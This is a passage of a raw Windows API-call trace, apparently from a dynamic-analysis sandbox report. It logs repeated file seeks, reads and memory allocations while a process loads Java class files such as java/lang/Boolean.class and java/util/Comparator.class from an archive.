lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x1008, lpOverlapped=0x0) returned 1 [0090.961] malloc (_Size=0x48) returned 0x2111af0 [0090.961] malloc (_Size=0xa0) returned 0x121d0b70 [0090.961] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e198, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54649240) returned 1 [0090.961] ReadFile (in: hFile=0x134, lpBuffer=0x121d0b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121d0b70*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.961] malloc (_Size=0x1f) returned 0x2114500 [0090.962] free (_Block=0x121d0b70) [0090.962] strlen (_Str="java/security/CodeSource.class") returned 0x1e [0090.962] strcpy (in: _Dest=0x208f380, _Source="java/security/CodeSource.class" | out: _Dest="java/security/CodeSource.class") returned="java/security/CodeSource.class" [0090.962] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e5122, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52318498) returned 1 [0090.962] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.963] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e515e, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52318558) returned 1 [0090.963] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x1a0a, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x1a0a, lpOverlapped=0x0) returned 1 [0090.964] free (_Block=0x2114080) [0090.964] free (_Block=0x2111870) [0090.987] strlen (_Str="java/lang/StackTraceElement.class") returned 0x21 [0090.988] malloc (_Size=0x48) returned 0x2111b40 [0090.988] malloc (_Size=0xa0) returned 0x121d0b70 [0090.988] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e149, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54649161) returned 1 [0090.988] ReadFile (in: hFile=0x134, lpBuffer=0x121d0b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121d0b70*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.988] malloc (_Size=0x22) returned 0x21143e0 [0090.988] free (_Block=0x121d0b70) [0090.989] strlen (_Str="java/lang/StackTraceElement.class") returned 0x21 [0090.989] strcpy (in: _Dest=0x208f380, _Source="java/lang/StackTraceElement.class" | out: _Dest="java/lang/StackTraceElement.class") returned="java/lang/StackTraceElement.class" [0090.990] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e49f6, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52316662) returned 1 [0090.990] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.991] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e4a35, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52316725) returned 1 [0090.991] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x6ed, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x6ed, lpOverlapped=0x0) returned 1 [0090.991] free (_Block=0x2114500) [0090.991] free (_Block=0x2111af0) [0091.008] strlen (_Str="java/nio/Buffer.class") returned 0x15 [0091.008] malloc (_Size=0x48) returned 0x2111af0 [0091.008] malloc (_Size=0xa0) returned 0x121d0b70 [0091.008] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e106, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54649094) returned 1 [0091.008] ReadFile (in: hFile=0x134, lpBuffer=0x121d0b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121d0b70*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0091.008] malloc (_Size=0x16) returned 0x21150f0 [0091.009] free (_Block=0x121d0b70) [0091.009] strlen (_Str="java/nio/Buffer.class") returned 0x15 [0091.009] strcpy (in: _Dest=0x208f380, _Source="java/nio/Buffer.class" | out: _Dest="java/nio/Buffer.class") returned="java/nio/Buffer.class" [0091.009] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e3fdd, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52314077) returned 1 [0091.009] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0091.010] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e4010, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52314128) returned 1 [0091.010] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x9e6, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x9e6, lpOverlapped=0x0) returned 1 [0091.011] free (_Block=0x21143e0) [0091.011] free (_Block=0x2111b40) [0091.022] strlen (_Str="java/lang/Boolean.class") returned 0x17 [0091.022] malloc (_Size=0x48) returned 0x2111ff0 [0091.022] malloc (_Size=0xa0) returned 0x21fe880 [0091.022] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e0c1, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54649025) returned 1 [0091.022] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0091.023] malloc (_Size=0x18) returned 0x2115110 [0091.023] free (_Block=0x21fe880) [0091.023] strlen (_Str="java/lang/Boolean.class") returned 0x17 [0091.023] strcpy (in: _Dest=0x208f380, _Source="java/lang/Boolean.class" | out: _Dest="java/lang/Boolean.class") returned="java/lang/Boolean.class" [0091.023] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e3690, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52311696) returned 1 [0091.024] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0091.024] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e36c5, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52311749) returned 1 [0091.024] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x918, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x918, lpOverlapped=0x0) returned 1 [0091.024] free (_Block=0x21150f0) [0091.024] free (_Block=0x2111af0) [0091.050] malloc (_Size=0x48) returned 0x2112040 [0091.050] malloc (_Size=0xa0) returned 0x21fe880 [0091.050] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e07a, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54648954) returned 1 [0091.050] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0091.051] malloc (_Size=0x1a) returned 0x21143e0 [0091.051] free (_Block=0x21fe880) [0091.052] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e0912, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52300050) returned 1 [0091.052] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0091.053] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31e0949, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52300105) returned 1 [0091.054] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x2d47, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x2d47, lpOverlapped=0x0) returned 1 [0091.265] malloc (_Size=0x48) returned 0x2111ff0 [0091.265] malloc (_Size=0xa0) returned 0x21fe880 [0091.265] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341e037, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54648887) returned 1 [0091.265] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0091.265] malloc (_Size=0x16) returned 0x2114f10 [0091.266] free (_Block=0x21fe880) [0091.266] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31dfc0f, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52296719) returned 1 [0091.266] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0091.267] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31dfc42, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52296770) returned 1 [0091.267] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0xcd0, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0xcd0, lpOverlapped=0x0) returned 1 [0091.268] malloc (_Size=0x48) returned 0x2111af0 [0091.268] malloc (_Size=0xa0) returned 0x21fe880 [0091.268] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341dff3, lpNewFilePointer=0x208e7c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e7c0*=54648819) returned 1 [0091.268] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e790, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208e790*=0xa0, lpOverlapped=0x0) returned 1 [0091.268] malloc (_Size=0x17) returned 0x2114f50 [0091.269] free (_Block=0x21fe880) [0091.269] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31dfa23, lpNewFilePointer=0x208e3c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3c0*=52296227) returned 1 [0091.269] ReadFile (in: hFile=0x134, lpBuffer=0x208e410, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e390, lpOverlapped=0x0 | out: lpBuffer=0x208e410*, lpNumberOfBytesRead=0x208e390*=0x1e, lpOverlapped=0x0) returned 1 [0091.269] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31dfa57, lpNewFilePointer=0x208e420, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e420*=52296279) returned 1 [0091.269] ReadFile (in: hFile=0x134, lpBuffer=0x121b5950, nNumberOfBytesToRead=0x1b8, lpNumberOfBytesRead=0x208e3f0, lpOverlapped=0x0 | out: lpBuffer=0x121b5950*, lpNumberOfBytesRead=0x208e3f0*=0x1b8, lpOverlapped=0x0) returned 1 [0091.270] malloc (_Size=0x48) returned 0x2112680 [0091.270] malloc (_Size=0xa0) returned 0x21fe880 [0091.270] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341dfaf, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54648751) returned 1 [0091.270] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0091.270] malloc (_Size=0x17) returned 0x2115470 [0091.271] free (_Block=0x21fe880) [0091.271] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31dea84, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52292228) returned 1 [0091.271] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0091.272] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31deab8, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52292280) returned 1 [0091.272] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0xf6b, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0xf6b, lpOverlapped=0x0) returned 1 [0091.273] malloc (_Size=0x48) returned 0x2111870 [0091.273] malloc (_Size=0xa0) returned 0x21fe880 [0091.273] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341df6d, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54648685) returned 1 [0091.273] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0091.273] malloc (_Size=0x15) returned 0x2115070 [0091.274] free (_Block=0x21fe880) [0091.274] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31ddecf, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52289231) returned 1 [0091.274] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0091.275] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31ddf01, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52289281) returned 1 [0091.275] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0xb83, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0xb83, lpOverlapped=0x0) returned 1 [0091.276] malloc (_Size=0x48) returned 0x2111ff0 [0091.276] malloc (_Size=0xa0) returned 0x21fe880 [0091.276] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341df2a, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54648618) returned 1 [0091.276] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0091.276] malloc (_Size=0x16) returned 0x21155b0 [0091.277] free (_Block=0x21fe880) [0091.277] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31dd293, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52286099) returned 1 [0091.277] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0091.277] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31dd2c6, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52286150) returned 1 [0091.277] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0xc09, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0xc09, lpOverlapped=0x0) returned 1 [0091.278] malloc (_Size=0x48) returned 0x2111af0 [0091.278] malloc (_Size=0xa0) returned 0x21fe880 [0091.278] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341dee5, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54648549) returned 1 [0091.278] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0091.278] malloc (_Size=0x18) returned 0x2114fd0 [0091.278] free (_Block=0x21fe880) [0091.278] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31db01d, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52277277) returned 1 [0091.279] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0091.279] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31db052, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52277330) returned 1 [0091.280] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x2241, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x2241, lpOverlapped=0x0) returned 1 [0091.282] malloc (_Size=0x48) returned 0x2111ff0 [0091.282] malloc (_Size=0xa0) returned 0x21fe880 [0091.282] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341dea3, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54648483) returned 1 [0091.282] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0091.282] malloc (_Size=0x15) returned 0x2115230 [0091.282] free (_Block=0x21fe880) [0091.283] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d8f69, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52268905) returned 1 [0091.283] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0091.284] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d8f9b, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52268955) returned 1 [0091.284] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x2082, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x2082, lpOverlapped=0x0) returned 1 [0091.655] malloc (_Size=0x48) returned 0x2112040 [0091.655] malloc (_Size=0xa0) returned 0x21febb0 [0091.655] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341de51, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54648401) returned 1 [0091.655] ReadFile (in: hFile=0x134, lpBuffer=0x21febb0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21febb0*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0091.655] malloc (_Size=0x25) returned 0x21140e0 [0091.656] free (_Block=0x21febb0) [0091.656] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d8e0a, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52268554) returned 1 [0091.656] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0091.656] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d8e4c, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52268620) returned 1 [0091.656] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x11d, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208ee30*=0x11d, lpOverlapped=0x0) returned 1 [0091.656] malloc (_Size=0x48) returned 0x2111af0 [0091.656] malloc (_Size=0xa0) returned 0x21febb0 [0091.656] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341de00, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54648320) returned 1 [0091.657] ReadFile (in: hFile=0x134, lpBuffer=0x21febb0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21febb0*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0091.657] malloc (_Size=0x24) returned 0x21143e0 [0091.657] free (_Block=0x21febb0) [0091.657] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d8cad, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52268205) returned 1 [0091.657] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0091.657] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d8cee, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52268270) returned 1 [0091.657] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x11c, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208ee30*=0x11c, lpOverlapped=0x0) returned 1 [0091.792] strlen (_Str="java/io/ObjectStreamField.class") returned 0x1f [0091.792] malloc (_Size=0x48) returned 0x121d92b0 [0091.792] malloc (_Size=0xa0) returned 0x121dc840 [0091.792] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ddb3, lpNewFilePointer=0x208e5f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e5f0*=54648243) returned 1 [0091.792] ReadFile (in: hFile=0x134, lpBuffer=0x121dc840, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e5c0, lpOverlapped=0x0 | out: lpBuffer=0x121dc840*, lpNumberOfBytesRead=0x208e5c0*=0xa0, lpOverlapped=0x0) returned 1 [0091.792] malloc (_Size=0x20) returned 0x121d7e20 [0091.793] free (_Block=0x121dc840) [0091.793] strlen (_Str="java/io/ObjectStreamField.class") returned 0x1f [0091.793] strcpy (in: _Dest=0x208e770, _Source="java/io/ObjectStreamField.class" | out: _Dest="java/io/ObjectStreamField.class") returned="java/io/ObjectStreamField.class" [0091.793] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d7cde, lpNewFilePointer=0x208e1f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1f0*=52264158) returned 1 [0091.794] ReadFile (in: hFile=0x134, lpBuffer=0x208e240, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e1c0, lpOverlapped=0x0 | out: lpBuffer=0x208e240*, lpNumberOfBytesRead=0x208e1c0*=0x1e, lpOverlapped=0x0) returned 1 [0091.807] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d7d1b, lpNewFilePointer=0x208e250, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e250*=52264219) returned 1 [0091.807] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xf92, lpNumberOfBytesRead=0x208e220, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e220*=0xf92, lpOverlapped=0x0) returned 1 [0091.808] free (_Block=0x21143e0) [0091.808] free (_Block=0x2111af0) [0091.817] strlen (_Str="java/lang/String$CaseInsensitiveComparator.class") returned 0x30 [0091.817] malloc (_Size=0x48) returned 0x121d9030 [0091.817] malloc (_Size=0xa0) returned 0x121dc840 [0091.817] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341dd55, lpNewFilePointer=0x208e5f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e5f0*=54648149) returned 1 [0091.817] ReadFile (in: hFile=0x134, lpBuffer=0x121dc840, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e5c0, lpOverlapped=0x0 | out: lpBuffer=0x121dc840*, lpNumberOfBytesRead=0x208e5c0*=0xa0, lpOverlapped=0x0) returned 1 [0091.818] malloc (_Size=0x31) returned 0x121da170 [0091.818] free (_Block=0x121dc840) [0091.819] strlen (_Str="java/lang/String$CaseInsensitiveComparator.class") returned 0x30 [0091.819] strcpy (in: _Dest=0x208e770, _Source="java/lang/String$CaseInsensitiveComparator.class" | out: _Dest="java/lang/String$CaseInsensitiveComparator.class") returned="java/lang/String$CaseInsensitiveComparator.class" [0091.819] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d77eb, lpNewFilePointer=0x208e1f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1f0*=52262891) returned 1 [0091.819] ReadFile (in: hFile=0x134, lpBuffer=0x208e240, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e1c0, lpOverlapped=0x0 | out: lpBuffer=0x208e240*, lpNumberOfBytesRead=0x208e1c0*=0x1e, lpOverlapped=0x0) returned 1 [0091.819] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31d7839, lpNewFilePointer=0x208e250, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e250*=52262969) returned 1 [0091.819] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x4a5, lpNumberOfBytesRead=0x208e220, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e220*=0x4a5, lpOverlapped=0x0) returned 1 [0091.820] free (_Block=0x121d7e20) [0091.820] free (_Block=0x121d92b0) [0091.821] strlen (_Str="java/util/Comparator.class") returned 0x1a [0091.821] malloc (_Size=0x48) returned 0x121d92b0 [0091.821] malloc (_Size=0xa0) returned 0x121dc840 [0091.821] SetFilePointerEx (in: 